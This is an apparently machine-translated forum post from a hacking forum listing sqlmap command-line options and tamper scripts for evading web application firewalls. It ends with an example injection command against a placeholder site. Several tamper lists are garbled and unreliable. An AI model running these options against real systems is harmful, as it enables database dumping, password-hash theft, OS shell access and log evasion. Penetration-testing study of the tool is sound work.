Welcome, Hacker.
Join the community to take advantage of all its opportunities
Sign up

SqlMap commands




Aug 3, 2019
  • Cracker
  • Launch
  • Emerald
  • Trusted Seller
 -d DIRECT Direct database connection
-u URL, --url = URL of the target URL (for example, "www.target.com/vuln.php?id=1")
-l LOGFILE Log from Burp or WebScarb proxy to a file
-m BULKFILE Scan against a list of targets specified in the transferred file
-r REQUESTFILE Load HTTP request from file
-g GOOGLEDORK Use the result of issuing Google dorks as the target url \ 's (site :, inurl :, intext :)
-c CONFIGFILE Load settings from the configuration INI file.
--data = DATA String of data to be transmitted by POST request
--param-del = PDEL Designation used to separate the values of paramater
--cookie = COOKIE http cookie header
--cookie-del = CDEL The designation used to separate cookie values
--load-cookies = A .. File containing cookies in Netscape / wget format
--drop-set-cookie Ignore the Set-Cookie header in the response
--user-agent = AGENT HTTP User-Agent header
--random-agent Use random HTTP User-Agent header
--host = HOST HTTP Host Header
--referer = REFERER HTTP Referer header
--headers=HEADERS   Extra заголовки (т.е. "Accept-Language: fr\nETag: 123")
--auth-type = ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred = ACRED HTTP Authentication Data (name: password)
--auth-private = A .. Private PEM key file for HTTP authentication
--proxy = PROXY HTTP proxy to connect to destination URL
--proxy-cred = PCRED Authentication data through HTTP proxy (name: password)
--ignore-proxy Ignore proxy system settings
--tor Use TOR to connect
--tor-port = TORPORT Specify a TOR proxy port that is different from the default
--tor-type = TORTYPE Specify the type of TOR proxy (HTTP (default), SOCKS4 or SOCKS5)
--check-tor Check if TOR is being used properly
--delay = DELAY Delay in seconds between each HTTP request
--timeout = TIMEOUT Timeout in seconds to reset the connection (30 default)
--retries = RETRIES Number of repetitions at a timeout (3 default)
--randomize = RPARAM Random value for given parameters
--safe-url = SAFURL URL often visited during testing
--safe-freq = SAFREQ Test requests between two calls to the given safe URL
--skip-urlencode Skip payload data encoding
--force-ssl Force SSL / https
--hpp Use HPP request parameter pollution
--eval = EVALCODE Execute Python code before the request (ie "import hashlib; id2 = hashlib.md5 (id) .hexdigest ()")
 -o Enable all kinds of optimization
--predict-output Predict common outgoing headers
--keep-alive Use persistent HTTP (S) connection
--null-connection Get page size without http response body
--threads = THREADS Maximum number of simultaneous http (s) requests (default - 1)
 -p TESTPARAMETER Tested Parameters
--skip = SKIP Skip the test for the given parameters
--dbms = DBMS Force (?) to use background DBMS
--dbms-cred = DBMS .. Data for authentication to the DBMS (user: password)
--os = OS Use OS server-side DBMSs for given values
--invalid-bignum Use large numbers to determine invalid values
--invalid-logical Use logical operations to determine invalid values
--invalid-string Use random strings to determine invalid values
--no-cast Disable payload
--no-escape Disable string escaping
--prefix = PREFIX Payload in the prefix line
--suffix = SUFFIX Payload in suffix line
--tamper = TAMPER Use a script to fake injection data
 - level = LEVEL Test level (1-5, default 1)
--risk = RISK Testing risk (0-3, default 1)
--string = STRING String to match if the request returns TRUE
--not-string = NOT .. String to match if the request returns FALSE
--regexp = REGEXP The regular to match when the request is TRUE
--code = CODE HTTP code when request is TRUE
--text-only Compare text based pages
--titles Comparing pages based on their titles
 - technique = TECH Used SQL injection method (default "BEUSTQ")
--time-sec = TIMESEC DB response delay in seconds (default 5)
--union-cols = UCOLS Column range for test with UNION SQL injection query
--union-char = UCHAR Identification for using the number of columns bruteforce
--union-from = UFROM Table for use in the FROM part of a UNION request
--dns-domain = DNS .. The domain name used to attack exfiltration DNS
--second-order = S .. URL of the final page found for the second-order request
 -f, --fingerprint Retrieve extended database version information by fingerprint
-a, --all Get everything
-b, --banner Get a textual DBMS banner (official name, version number)
--current-user Get the current DBMS user
--current-db Get used database
--hostname Get the host name of the DBMS server
--is-dba Determine whether we are admin or not.
--users List DBMS users
--passwords List the password hashes of DBMS users
--privileges List privileges
--roles List user roles
--dbs List databases in a DBMS
--tables List the tables of the current database
--columns List the columns of the current database
--schema List DBMS schemas
--count Get the number of entries in the tables.
--dump Dump entries in the current database table
--dump-all Dump all tables from databases in the DBMS
--search Search for columns, tables and / or database names
--comments Get DBMS Comments
-D DB Database in DBMS for listing
-T TBL DBMS table for listing
-C COL DBMS table column for listing
-X EXCLUDECOL Do not list subsequent columns
-U USER DBMS user for re-listing
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--where = DUMPWHERE Use WHERE if the table is hidden
--start = LIMITSTART Retrieve the first record of the query result
--stop = LIMITSTOP Retrieve the last record of the query result
--first = FIRSTCHAR Retrieve the first character of a word as a result of a query
--last = LASTCHAR Retrieve the last character of a word as a result of a query
--sql-query = QUERY SQL queries to be executed
--sql-shell Invoke interactive SQL shell \ 'a
--sql-file = SQLFILE Execute SQL queries from file (s)
 - common-tables Check for common tables
--common-columns Check for shared columns
User Defined Functions
 - udf-inject Inject user-defined SQL
--shared-lib = SHLIB Local path to the shared library
File system access
 - file-read = RFILE Read a file from the FS server database
--file-write = WFILE Write a file to the FS
--file-dest = DFILE The absolute path to write the file to the server DBMS [ CODE]

Operating system access
[CODE] - os-cmd = OSCMD Run the command in the OS shell
--os-shell Call interactive OS shell
--os-pwn Invoke your own out-of-band shell, meterpeter, or VNC
--os-smbrelay Quick call OBB, meterpeter or VNC
--os-bof Buffer Overflow Operation
--priv-esc Increasing privileges of user processes working with the database
--msf-path = MSFPATH Local path, Metasploit Framework installation
--tmp-path = TMPPATH The absolute path to the temporary files directory
Access to the Windows registry
 - reg-read Read the registry key value
--reg-add Write the registry key value
--reg-del Delete registry key value
--reg-key = REGKEY Registry key
--reg-value = REGVAL Registry key value
--reg-data = REGDATA Registry key value data
--reg-type = REGTYPE Type of registry key value
 -s SESSIONFILE Load saved session from file (.sqlite)
-t TRAFFICFILE Write all HTTP traffic to a file
--batch Do not prompt for user input, default action
--charset = CHARSET Set encoding for retrieved data
--crawl = CRAWLDEPTH Explore a website starting at a given URL
--csv-del = CSVDEL Separate characters in CSV output (default ",")
--dump-format = DU .. Data dump format (CSV (default), HTML or SQLITE)
--eta Show estimated time for each output
--flush-session Ignore session files for the current target
--forms Parse and test forms at a given URL
--fresh-queries Ignore the results of queries stored in the session file
--hex Use DBMS hash functions for retrieved data
--output-dir = ODIR Custom let for outgoing data
--parse-errors Parse and display errors
--pivot-column = P .. Name of the main (key) column
--save Save settings to configuration INI file
--scope = SCOPE The regularity for filtering targets from the provided proxies in the file
--test-filter = TE .. Select tests based on payload or headers (for example, ROW)
--update Update SQLmap
 -z MNEMONICS Use short mnemonics (such as "flu, bat, ban, tec = EU")
--alert = ALERT Run console commands when SQL vulnerability is found
--answers = ANSWERS Ask answers to questions (for example, "quit = N, follow = N")
--beep Audible alert when finding vulnerability
--check-waf Heuristic verification of WAF / IPS / IDS protection
--cleanup Cleaning the DBMS with SQLmap UDF and tables
--dependencies Check for missing SQLmap dependencies
--disable-coloring Disable console coloring
--gpage = GOOGLEPAGE Specify the Google page number from which to start searching for dorks
--identify-waf Conduct testing for WAF / IPS / IDS protection
--mobile Simulate smartphone User-Agent header from HTTP
--page-rank Display page rank for Google Dork results
--purge-output Safely remove all content from the output directory
--smart Perform testing only with a positive heuristic analysis
--wizard A simple interface for novice users with requests for all actions
 -h, --help Print a short help on the program
-hh Prints full help for the program.
--version Print the program version
-v VERBOSE Level of detail: 0-6 (default 1)
apostrophemask.py replaces the single quote character with UTF-8 characters
apostrophenullencode.py replaces single quote characters with Unicode double byte
appendnullbyte.py, adds a null character at the end of the payload encoding
base64encode.py uses Base64 encoding for this payload
between.py, “the BETWEEN the AND # #” is replaced with “NOT BETWEEN 0 AND #” replace greater-than sign “>” equal sign “=”
bluecoat.py replaces spaces with a valid random space followed by a request. Alternatively put the equal sign “=”
chardoubleencode.py uses double URL encoding for a given payload, all characters (not, processes characters already encoded)
charencode.py uses URL encoding for a given payload, all characters (not handle characters already encoded)
charunicodeencode.py uses Unicode URL encoding for a given payload of an unencoded character (the character no longer addresses the encoded one)
concat2concatws.py substitute, replaces “CONCAT_WS (0), 0, 0), A, B)” with “CONCAT (A, B)”
equaltolike.py replaces similar operators with the equal sign “=”
greatest.py uses the “GREATEST” function instead of “>”
halfversionedmorekeywords.py adds arbitrary MySQL comments before each keyword
ifnull2ifisnull.py with “IF (ISNULL (A), B, A)” replaces “IFNULL (A, B)” examples
lowercase.py replaces the values from each lowercase character and keyword
modsecurityversioned.py surrounds the full request with comments
modsecurityzeroversioned.py surrounds comments, "0" with a complete request
multiplespaces.py adds more spaces around SQL keywords
nonrecursivereplacement.py replaces predefined keywords using the provided SQL
overlongutf8.py converts all characters to payload
percentage.py adds a percent sign% in front of each character
randomcase.py random character case substitution for each keyword
randomcomments.py inserts random comments into SQL keywords
securesphere.py adds sequence through special configuration
sp_password.py Adds 'sp_password' to the end of the payload to automatically confuse DBMS log files
space2comment.py replaces the spaces “/ ** /”
space2dash.py dashes the comment character “-” along with a line feed in a random series of characters and replaces spaces
space2hash.py comment on the “#” character followed by a line feed in a random string of characters and replace the space
space2morehash.py is the same as hash.py
space2mssqlblank.py replaces spaces, next to a valid candidate among a set of random character space
space2mssqlhash.py comment out the “#” character followed by a space to replace with a new line
space2mysqlblank.py replaces spaces with the next valid candidate among a set of random character spaces
space2mysqldash.py dashes the comment character “-” to accompany and replace linefeeds with spaces
space2plus.py adds a plus “+” with spaces
space2randomblank.py replaces spaces with a row of valid candidate, among a set, random character space
unionalltounion.py replace UNION ALL SELECT with UNION SELECT
unmagicquotes.py uses and replaces multi-byte% bf% 27 and replaces the end of the general information with spaces
varnish.py adds “X-originating-IP” to HTTP header to bypass WAF
versionedkeywords.py surrounds each function key without commenting from the MySQL database
versionedmorekeywords.py surrounds each query keyword in MySQL records

universal set suitable for all databases:
 tamper = apostrophemask, apostrophenullencode, base64encode, between, chardoubleencode, charencode, charunicodeencode, equaltolike, greatest, ifnull2ifisnull, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, space2comment, space2plusquot unitm2, unit2, unit2 space

[CODE] tamper = between, charencode, charunicodeencode, equaltolike, greatest, multiplespaces, nonrecursivereplacement, percentage, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionmt

[CODE] tamper = between, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, percentage2 space2ash2 space space com , unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor
Tool usage example in sqlmap
 sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' –level = 5 –risk = 3 -p 'item1' –tamper = apostrophemask, apostrophenullencode, appendnullbyte, base64encode , between, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, greatest, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacementl, space2m, space2m, space2m, space2m, spacem , space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords

Members, viewing this thread

No members online now.